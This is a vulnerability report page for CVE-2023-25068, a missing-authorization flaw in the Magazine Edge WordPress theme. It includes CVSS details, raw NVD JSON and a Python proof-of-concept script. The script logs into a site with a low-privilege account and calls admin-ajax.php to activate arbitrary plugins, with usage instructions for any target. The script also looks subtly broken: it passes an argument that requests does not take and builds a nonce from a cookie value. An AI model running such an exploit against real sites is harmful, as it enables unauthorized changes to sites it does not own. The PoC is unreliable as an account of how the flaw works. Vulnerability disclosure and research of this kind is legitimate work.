Security Vulnerability Report
中文
CVE-2023-25068 CVSS 4.3 MEDIUM

CVE-2023-25068

Published: 2025-12-21 00:15:51
Last Modified: 2026-04-28 19:19:46

Description

Missing Authorization vulnerability in Mapro Collins Magazine Edge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Magazine Edge: from n/a through 1.13.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Magazine Edge Theme < 1.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-25068 PoC - Magazine Edge Unauthorized Plugin Activation # Author: Security Researcher # Target: WordPress with Magazine Edge Theme < 1.14 import requests import sys from urllib.parse import urljoin def exploit_cve_2023_25068(target_url, username, password, plugin_to_activate): """ Exploit for CVE-2023-25068 - Magazine Edge Missing Authorization Allows authenticated low-privilege users to activate arbitrary plugins """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Logging in as {username}...') response = session.post(login_url, data=login_data, follow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and 'wp-settings' not in response.text: print('[-] Login failed!') return False print('[+] Login successful!') # Step 2: Activate arbitrary plugin via AJAX endpoint # The vulnerable endpoint doesn't check for administrator privileges ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php') activate_data = { 'action': 'activate-plugin', 'plugin': plugin_to_activate, # e.g., 'hello-dolly/hello.php' '_wpnonce': session.cookies.get('wordpress_sec_' + username) or '' } print(f'[*] Attempting to activate plugin: {plugin_to_activate}') response = session.post(ajax_url, data=activate_data) if 'success' in response.text or 'activated' in response.text.lower(): print(f'[+] Plugin {plugin_to_activate} activated successfully!') print('[!] This demonstrates the Missing Authorization vulnerability') return True else: print(f'[-] Plugin activation may have failed. Response: {response.text[:200]}') return False def main(): if len(sys.argv) < 5: print('Usage: python cve-2023-25068.py <target_url> <username> <password> <plugin>') print('Example: python cve-2023-25068.py http://target.com subscriber password hello-dolly/hello.php') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] plugin = sys.argv[4] exploit_cve_2023_25068(target, user, pwd, plugin) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-25068", "sourceIdentifier": "[email protected]", "published": "2025-12-21T00:15:51.183", "lastModified": "2026-04-28T19:19:45.530", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mapro Collins Magazine Edge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Magazine Edge: from n/a through 1.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/theme/magazine-edge/vulnerability/wordpress-magazine-edge-theme-1-13-authenticated-arbitrary-plugin-activation?_s_id=cve", "source": "[email protected]"}]}}